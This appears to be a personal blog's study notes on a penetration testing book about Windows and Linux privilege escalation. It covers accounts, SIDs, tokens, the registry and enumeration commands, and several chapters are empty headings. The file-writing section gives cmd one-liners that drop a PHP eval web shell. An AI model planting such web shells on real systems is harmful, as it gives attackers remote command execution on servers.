El libro

Introduction

This article is used to keep notes and summaries of the book “Privilege Escalation - Offensive and Defensive Tactics and Techniques”.
The content will be continuously updated as I read through the book.

Reflection

Chapter.1 - Fundamentals

1.2 - Windows Privilege Escalation

Local User And Local Group

cmd:

> net user

User accounts for \\DESKTOP-NKNBEK2

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
sdksdk                   WDAGUtilityAccount
The command completed successfully.

PowerShell

PS > Get-LocalUser

Name               Enabled Description
----               ------- -----------
Administrator      False   Built-in account for administering the computer/domain
DefaultAccount     False   A user account managed by the system.
Guest              False   Built-in account for guest access to the computer/domain
sdksdk             True
WDAGUtilityAccount False   A user account managed and used by the system for Windows Defender Application Guard scen...

lusrmgr.msc

---

> net user <Username> <Password> /add
> net user <Username> /del

---

Local Group

> net localgroup

Aliases for \\DESKTOP-NKNBEK2

-------------------------------------------------------------------------------
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Remote Management Users
*Replicator
*System Managed Accounts Group
*Users
The command completed successfully.

> Get-LocalGroup

Name                                Description
----                                -----------
Access Control Assistance Operators Members of this group can remotely query authorization attributes and permission...
Administrators                      Administrators have complete and unrestricted access to the computer/domain
Backup Operators                    Backup Operators can override security restrictions for the sole purpose of back...
Cryptographic Operators             Members are authorized to perform cryptographic operations.
Device Owners                       Members of this group can change system-wide settings.
Distributed COM Users               Members are allowed to launch, activate and use Distributed COM objects on this ...
Event Log Readers                   Members of this group can read event logs from local machine
Guests                              Guests have the same access as members of the Users group by default, except for...
Hyper-V Administrators              Members of this group have complete and unrestricted access to all features of H...
IIS_IUSRS                           Built-in group used by Internet Information Services.
Network Configuration Operators     Members in this group can have some administrative privileges to manage configur...
Performance Log Users               Members of this group may schedule logging of performance counters, enable trace...
Performance Monitor Users           Members of this group can access performance counter data locally and remotely
Power Users                         Power Users are included for backwards compatibility and possess limited adminis...
Remote Desktop Users                Members in this group are granted the right to logon remotely
Remote Management Users             Members of this group can access WMI resources over management protocols (such a...
Replicator                          Supports file replication in a domain
System Managed Accounts Group       Members of this group are managed by the system.
Users                               Users are prevented from making accidental or intentional system-wide changes an...

Useful group during penetration testing:

• Administrators
• Power Users
• Users
• Guests
• TrustedInstaller
• Authenticated Users

Built-in Account

• Local System:
  This account has the greatest power before Windows XP, it is able to modify file system, registry, task, Windows Installer, Windows Update, etc. However, Microsoft separated it, nowadays, the account with greatest pwoer is TrustedInstaller.
• Local Service
• Network Service

Useful Command:
| cmd | PowerShell | Description |
| —- | —- | —- |
| net user | Get-LocalUser | View local users. |
| net localgroup | Get-LocalGroup | View local groups. |
| net user | Get-LocalGroup -Name | Select-Object * | View user’s properties. |
| net localgroup | Get-LocalGroupMember | View users in the group. |
| net user /add | $password=Read-Host -AsSecureString New-LocalUser “username” -Password $password | Add new user. |
| net localgroup /add | Add-LocalGroupMember - Group ‘‘ -Member (‘‘) | Add user into the group. |
| net user /del | Remove-LocalUser -Name | Delete user. |
| net user | $password=Read-Host -AsSecureString Set-LocalUser -Name -Password $password | Change user’s password |

ACL (Access Control List)

Term	Meaning
Security Descriptor	Describe the information of Security Object, like SID, DACL, SACL, etc.
Security Object	Object with Security Descriptor, like file, directory, registry, process, thread, pipe, etc.
ACL	Access Control List
ACE	Access Control Entries
DACL	Discretionary Access Control List
SACL	System Access Control List
trustees	Account, group, login session, etc.

Security Descriptor

1. View SID of current user:

   > whoami /user

2. View SID of all users:

   > wmic useraccount get name,sid

   S-R-X-Y1-Y2-Yn-1-Yn:

   • S: Indicates that the string is a Security Identifier(SID).
   • R: Indicates the revision level.
   • X: Indicates the identifier authority value.

   • Y: Represents a series of subauthority values, where n is the number of values.

     • The first part of the series(-Y1-Y2-Yn-1) is the domain identifier. This element of the SID becomes significant in an enterprise with several domains. No two domains in an enterprise share the same domain identifier.
     • The last item in the series of subauthority values(-Yn) is the RID. It distinguishes one account or group from all other accounts and groups in the domain. Now two accounts or groups in any domain share the same RID.

   • Everyone: S-1-1-0

   • BUILTIN\Administrators: S-1-5-32-544, built-in adminsitrator group.
   • BUILTIN\Users: S-1-5-32-545, built-in user group.
   • NTAUTHORITY\INTERACTIVE: S-1-5-4, group of users which login whith interactive.
   • NTAUTHORITY\AuthenticatedUsers: S-1-5-11, authenticated users.
   • LocalService: S-1-5-19
   • NetworkService: S-1-5-20
   • LocalSystem: S-1-5-18

Authentication

• winlogon.exe
• lsass.exe
• SAM: Security Account Manager, /system32/config, HKEY_LOCAL_MACHINE

Token

An access token is an object that represents the security context of a process or thread.

A session is created after the user is successfully authenticated and logs in. The Windows system then determines the user’s SID and the SIDs of the groups to which the user belongs. Subsequently, the Local Security Authority (LSA) creates an access token for the user.

An access token contains the user’s SID, group SIDs, session ID, privileges, the default DACL, the token type, and other attributes.

The access token is assigned to userinit.exe, whose path is stored in the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.

userinit.exe is responsible for initializing the user’s environment, such as executing logon scripts, establishing network connections, and launching startup applications. It then reads the value of Shell, which is explorer.exe by default, and launches it as the Windows graphical user interface.

After that, all child processes and threads inherit the access token of their parent process—explorer.exe—unless a process explicitly specifies a different token. Initially, most processes share the same access token.

Token has two types:

1. Primary Token
2. Impersonation Token

Separation of Privilege

> whoami /priv

> gpedit.msc

PS> Enable-Privilege -Privilege SeBackupPrivilege

Command	Function
Enable-Privilege -Privilege <Privilege’s name>	Enable privilege
Disable-Privilege -Privilege <Privilege’s name>	Disable privilege
Add-Privilege -Privilege <Privilege’s name>	Add privilege
Remove-Privilege -Privilege <Privilege’s name>	Remove privilege
Get-Privilege -CurrentUser	View privilege of current user

Windows Hash

1. LM Hash
2. NTLM Hash

UAC

UAC (User Account Control)

Windows Service

Registry

Data type:

• REG_SZ
• REG_MULTI_SZ
• REG_BINARY
• REG_DWORD

Hive	Abbreviation	Description
HKEY_CLASSES_ROOT	HKCR	File associations and COM object registration.
HKEY_CURRENT_USER	HKCU	Settings for the currently logged-in user.
HKEY_LOCAL_MACHINE	HKLM	System-wide configuration for the entire machine.
HKEY_USERS	HKU	All user registry hives currently loaded.
HKEY_CURRENT_CONFIG	HKCC	Current hardware profile.

1.3 - Linux Privilege Escalation

User

• Root User(Super User)
• Regular User
• System User

User Group

User Configuration Files

File	Meaning
/etc/passwd	Users and their properties (such as, name, uid, group id).
/etc/shadow	Users’ password and properties.
/etc/group	Groups and their properties.
/etc/gshadow	Groups’ and their properties.

Source: https://infosecwriteups.com/what-is-etc-passwd-group-shadow-file-in-linux-bd7b28f353f3

Source: https://linuxopsys.com/etc-shadow-file-explained

Source: https://dpcvirtualtips.com/working-with-local-users-and-groups-on-rhel/

Source: https://ashutoshlinuxnotes.blogspot.com/p/user-and-group-permission.html

Chapter.2 - Environment Setting-up and Tools

2.2 - Kali Linux

Metasploit

> sudo msfconsole

> sudo msfdb status

> sudo msfdb init

msf> db_status

msf> search privilege escalation platform:windows type:exploit

Cobalt Strike

Empire 4

2.3 - PowerShell

2.4 - WinPEAs

2.5 - PowerUp and SharpUp

2.6 - Accesshk

2.7 - cacls and icacls

Chapter.3 - File Action

3.1 - Windows

Create/Write File

1. cmd
   1. Write file with set:

      set /p=<?php @eval($_POST['hello'])?^><nul>c:\1.php

   2. Write file with echo:

      echo ^<?php @eval($_POST['hello'])?>>c:\2.php

   3. Appending with echo:

      echp ok>>c:\2.php

   4. Appending without new line:

      set /p="222">>c:\1.php

   5. Overwrite:

      echo ok>c:\2.php

   6. Write file with echo without space:

      echo.^<?php @eval($_POST['hello'])?^>>c:\3.php
      echo,^<?php @eval($_POST['hello'])?^>>c:\3.php

   7. Create empty file:

      cd.>12.txt
      copy nul 12.txt
      type nul>12.txt
      fsutil file createnew c:\12.txt 0

   8. copy file

      type 1.php > ok.php
      copy 1.php ok.php

   9. move file

      move c:\1.txt d:\

2. PowerShell

Read File

Download File

1. PowerShell
2. PHP
3. Python
4. VBS
5. bitsadmin
6. certutil

Compress/Decompress File

1. makecab/expand
2. WinRAR
3. 7-Zip
4. BandiZip
5. PowerShell

3.2 - Linux

Chapter.4 - Windows Information Enumeration

4.1 - Server Information Enumeration

System Version

> ver

Architecture

> wmic os get osarchitecture

> echo %PROCESSOR_ARCHITECTURE%

Service Information

> sc query state=all

> wmic service list brief

PS> Get-WmiObject win32_service | select Name,PathName

Task

> tasklist

> tasklist /svc

> wmic process list brief

PS> ps

PS> Get-WmiObject -Query "select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

Driver Information

> driverquery

Disk Information

wmic logicaldisk get caption,description,providername

tree d:\ >C:\tree.txt

dir /s d:\ >C:\file.txt

Hotfix

> 

PS> 

PS> 

4.2 - Network Information Enumeration

4.3 - User’s Information Enumeration

4.4 - Anti-Virus Information Enumeration

Chapter.5 - Windows Password Action

Chapter.6 - Unsafe Windows System Configuration

Chapter.7 - Windows System Exploitation and Privilege Escalation

Chapter.8 - Linux Information Enumeration